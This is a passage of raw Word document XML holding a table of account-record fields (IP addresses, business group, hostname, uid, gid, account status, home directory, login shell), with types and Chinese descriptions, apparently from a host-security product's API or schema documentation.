            <w:r>
              <w:t>16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2BCCACFE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t xml:space="preserve">agent </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>uuid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1D0D3C32" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A384388" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B839146" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4168EE3D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="718882C2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>显示IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="21FF120B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FCB1D69" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>connectionIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E34176A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F732848" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FDD25C7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="43EC3755" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5164062A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="054D4EC1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01D2FF42" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="169742D9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5A5614F8" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="581380B5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F3D8EDE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="779EE929" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2663B651" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="45C32EE4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="336F5C3D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52326A73" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="732A92E5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43524238" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4C097E02" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BEAC4C8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="288C1256" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20A83374" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FCAA42E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="11C35AA6" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2333F1F6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AD63F0A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="283D1FDA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BFBB108" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="28BB71B5" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E794483" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D45FD86" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="611BF6C3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08D68510" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3CC39340" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A05FDC1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12E49627" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6661231E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="378D24A5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="22318CCD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35F4D8C4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>uid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D2C9ADE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="033DEAF4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="796B3DDF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>账号</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>uid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1C73CDD7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61F35788" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>gid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F71EC0C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60797AEC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F6DA586" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>用户组id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3FE7E137" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21AC6183" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D259F1A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57559158" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08B5C233" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>账户组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2BF72A17" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DB7C7C8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E782477" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="721BB6C7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C3FF06C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>账号名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2D2B7A4F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44167970" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D3DA9A9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31A2886B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43584A69" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t xml:space="preserve">账号状态 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 账号状态，1:启用，0:禁用 ；windows 账号状态，0:启用，1：锁定，2:禁用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="68613366" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77FFEC35" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>home</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3015A058" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48B529CF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6911BBDE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>home目录</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3579E647" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73FDC4A4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="696DB9B1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3179ADB8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="240A2D55" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>用户shell，仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="70051422" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="208407D0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>loginStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="042C7E1F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39EF30A5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="282A0B6D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
